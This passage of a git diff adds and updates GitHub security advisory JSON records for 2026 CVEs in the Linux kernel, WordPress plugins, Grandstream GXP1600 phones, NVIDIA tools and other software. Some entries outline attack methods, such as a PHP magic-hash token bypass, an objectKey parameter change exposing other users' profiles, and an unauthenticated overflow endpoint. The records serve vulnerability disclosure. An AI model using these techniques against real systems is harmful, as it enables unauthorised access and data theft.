"2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23211" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm, swap: restore swap_space attr aviod kernel panic\n\ncommit 8b47299a411a (\"mm, swap: mark swap address space ro and add context\ndebug check\") made the swap address space read-only. It may lead to\nkernel panic if arch_prepare_to_swap returns a failure under heavy memory\npressure as follows,\n\nel1_abort+0x40/0x64\nel1h_64_sync_handler+0x48/0xcc\nel1h_64_sync+0x84/0x88\nerrseq_set+0x4c/0xb8 (P)\n__filemap_set_wb_err+0x20/0xd0\nshrink_folio_list+0xc20/0x11cc\nevict_folios+0x1520/0x1be4\ntry_to_shrink_lruvec+0x27c/0x3dc\nshrink_one+0x9c/0x228\nshrink_node+0xb3c/0xeac\ndo_try_to_free_pages+0x170/0x4f0\ntry_to_free_pages+0x334/0x534\n__alloc_pages_direct_reclaim+0x90/0x158\n__alloc_pages_slowpath+0x334/0x588\n__alloc_frozen_pages_noprof+0x224/0x2fc\n__folio_alloc_noprof+0x14/0x64\nvma_alloc_zeroed_movable_folio+0x34/0x44\ndo_pte_missing+0xad4/0x1040\nhandle_mm_fault+0x4a4/0x790\ndo_page_fault+0x288/0x5f8\ndo_translation_fault+0x38/0x54\ndo_mem_abort+0x54/0xa8\n\nRestore swap address space as not ro to avoid the panic.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23211" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a0f3c0845a4ff68d403c568266d17e9cc553e561" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b0020cbd26380177b9fb8b7e75a8f7bdba79db20" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json b/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json new file mode 100644 index 0000000000000..f20f485158a3d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mx8g-qc6m-wcmf", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23218" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: loongson-64bit: Fix incorrect NULL check after devm_kcalloc()\n\nFix incorrect NULL check in loongson_gpio_init_irqchip().\nThe function checks chip->parent instead of chip->irq.parents.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23218" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e34f77b09080c86c929153e2a72da26b4f8947ff" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e71e3fa90a15134113f61343392e887cd1f4bf7c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json b/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json new file mode 100644 index 0000000000000..ebb7bcea28c29 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p4q3-g549-vvfc", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2026-1582" + ], + "details": "The WP All Export plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.14 via the export download endpoint. This is due to a PHP type juggling vulnerability in the security token comparison which uses loose comparison (==) instead of strict comparison (===). This makes it possible for unauthenticated attackers to bypass authentication using \"magic hash\" values when the expected MD5 hash prefix happens to be numeric-looking (matching pattern ^0e\\d+$), allowing download of sensitive export files containing PII, business data, or database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1582" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-all-export/tags/1.4.14/actions/wp_loaded.php#L19" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455775" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a92c682-b8b3-4d23-bd84-97d7440ee525?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json index 2d40cf4763f91..edb136c8f66c1 100644 --- a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json +++ b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pc38-57g8-39gg", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2025-69752" ], "details": "An issue in the \"My Details\" user profile functionality of Ideagen Q-Pulse 7.1.0.32 allows an authenticated user to view other users' profile information by modifying the objectKey HTTP parameter in the My Details page URL.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T16:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json new file mode 100644 index 0000000000000..4bcf8b83f90d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phqg-p332-q7vc", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23212" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: annotate data-races around slave->last_rx\n\nslave->last_rx and slave->target_last_arp_rx[...] can be read and written\nlocklessly. Add READ_ONCE() and WRITE_ONCE() annotations.\n\nsyzbot reported:\n\nBUG: KCSAN: data-race in bond_rcv_validate / bond_rcv_validate\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 1:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n...\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 0:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n br_netif_receive_skb net/bridge/br_input.c:30 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n...\n\nvalue changed: 0x0000000100005365 -> 0x0000000100005366", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23212" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c0be3277e7aefb2f900fc37ca3fe7df362e26f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a7516cb0165926d308187e231ccd330e5e3ebff7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b956289b83887e0a306067b6003c3fcd81bfdf84" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bd98324e327e41de04b13e372cc16f73150df254" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f6c3665b6dc53c3ab7d31b585446a953a74340ef" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json index 0242e02b8a189..d7850968c5787 100644 --- a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json +++ b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-918" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json new file mode 100644 index 0000000000000..8039ad0742203 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq2v-q6qr-p5vx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33251" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33251" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33251" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json new file mode 100644 index 0000000000000..00126b1233e55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq7g-427f-cm2r", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-1426" + ], + "details": "The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibility layer. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. Note: This vulnerability requires the Live Composer plugin to also be installed and active.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1426" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/502.html" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L25" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L28" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L33" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449344/#file418" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e76d57-217f-4f21-8bc6-a86290783a19?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json new file mode 100644 index 0000000000000..7f5cad051600a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r264-whc7-wwfw", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71226" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: Implement settime64 as stub for MVM/MLD PTP\n\nSince commit dfb073d32cac (\"ptp: Return -EINVAL on ptp_clock_register if\nrequired ops are NULL\"), PTP clock registered through ptp_clock_register\nis required to have ptp_clock_info.settime64 set, however, neither MVM\nnor MLD's PTP clock implementation sets it, resulting in warnings when\nthe interface starts up, like\n\nWARNING: drivers/ptp/ptp_clock.c:325 at ptp_clock_register+0x2c8/0x6b8, CPU#1: wpa_supplicant/469\nCPU: 1 UID: 0 PID: 469 Comm: wpa_supplicant Not tainted 6.18.0+ #101 PREEMPT(full)\nra: ffff800002732cd4 iwl_mvm_ptp_init+0x114/0x188 [iwlmvm]\nERA: 9000000002fdc468 ptp_clock_register+0x2c8/0x6b8\niwlwifi 0000:01:00.0: Failed to register PHC clock (-22)\n\nI don't find an appropriate firmware interface to implement settime64()\nfor iwlwifi MLD/MVM, thus instead create a stub that returns\n-EOPTNOTSUPP only, suppressing the warning and allowing the PTP clock to\nbe registered.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71226" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/81d90d93d22ca4f61833cba921dce9a0bd82218f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ff6892ea544c4052dd5799f675ebc20419953801" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json new file mode 100644 index 0000000000000..0c7963d6b7ddd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4m3-cm43-fxrj", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-2329" + ], + "details": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2329" + }, + { + "type": "WEB", + "url": "https://github.com/rapid7/metasploit-framework/pull/20983" + }, + { + "type": "WEB", + "url": "https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf" + }, + { + "type": "WEB", + "url": "https://psirt.grandstream.com" + }, + { + "type": "WEB", + "url": "https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json new file mode 100644 index 0000000000000..bd2e0e158666f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r77x-pqm4-6252", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60037" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60037" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json new file mode 100644 index 0000000000000..c577f818717f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgjw-pqcr-56gf", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-14340" + ], + "details": "Cross-site scripting in REST Management Interface in Payara Server <4.1.2.191.54, <5.83.0, <6.34.0, <7.2026.1 allows an attacker to mislead the administrator to change the admin password via URL Payload.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:X/RE:M/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14340" + }, + { + "type": "WEB", + "url": "https://docs.payara.fish/enterprise/docs/Security/Security%20Fix%20List.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json new file mode 100644 index 0000000000000..a0dc26782875f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjm5-gmfm-6cp4", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-2656" + ], + "details": "A flaw has been found in ChaiScript up to 6.1.0. This affects the function chaiscript::Type_Info::bare_equal of the file include/chaiscript/dispatchkit/type_info.hpp. This manipulation causes use after free. The attack requires local access. The attack's complexity is rated as high. The exploitability is reported as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2656" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/636" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/636#issue-3828333582" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json new file mode 100644 index 0000000000000..da27a8ec09d4a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv75-v2gv-p54c", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33239" + ], + "details": "NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33239" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5781" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33239" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json index 819900c824fed..d660ca2f4621d 100644 --- a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json +++ b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rvhp-mghq-8mvw", - "modified": "2026-02-14T00:32:42Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-14T00:32:42Z", "aliases": [ "CVE-2025-70957" ], "details": "A Denial of Service (DoS) vulnerability was discovered in the TON Lite Server before v2024.09. The vulnerability arises from the handling of external arguments passed to locally executed \"get methods.\" An attacker can inject a constructed Continuation object (an internal TVM type) that is normally restricted within the VM. When the TVM executes this malicious continuation, it consumes excessive CPU resources while accruing disproportionately low virtual gas costs. This \"free\" computation allows an attacker to monopolize the Lite Server's processing power, significantly reducing its throughput and causing a denial of service for legitimate users acting through the gateway.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-674" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T22:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json new file mode 100644 index 0000000000000..94425dd4e91d3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfmw-4jmp-wmrw", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60035" + ], + "details": "A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running the OPC.Testclient.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60035" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json new file mode 100644 index 0000000000000..248e19f7829d5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqcj-rgfw-jjcq", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23214" + ], 